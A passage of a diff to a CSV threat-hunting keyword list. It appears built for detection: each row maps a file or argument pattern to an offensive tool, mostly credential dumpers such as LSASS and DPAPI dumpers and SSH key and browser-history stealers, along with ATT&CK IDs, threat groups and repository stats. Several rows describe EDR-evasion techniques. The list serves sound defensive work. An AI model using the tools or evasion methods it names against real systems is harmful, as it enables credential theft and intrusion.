- T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_keepassx*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" @@ -9661,12 +9809,12 @@ "*dump_lsass.js*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*dump_process(*lsass.exe*)*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*dump_sam(*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*dump_secrets.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*dump_ssh_keys*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_tomcat*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" -"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_INTERNET_EXPLORER*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_NGC_LOCAL_ACCOOUNT*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*dump_VAULT_WIN_BIO_KEY*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*dump_webconf*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_webpass*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*dump_wifi_wpa_*","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","166","25","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" @@ -9674,103 +9822,104 @@ "*dump_WPA-PMKID-PBKDF2.hashcat*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*DumpBrowserHistory*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*DumpCreds*","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","1","4","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z" -"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*dumpert_path=*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*Dumpert-Aggressor*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Dumpert-Aggressor*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*dumpertdll*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*Dumpert-DLL*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*-DumpForest *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*dumplsass*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*dumpntlm.py*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" -"*DumpNTLMInfo.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*-DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*dumpCredStore.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","0","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.bin*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.dmp*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.exe*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Dumpert.git*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*dumpert.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential 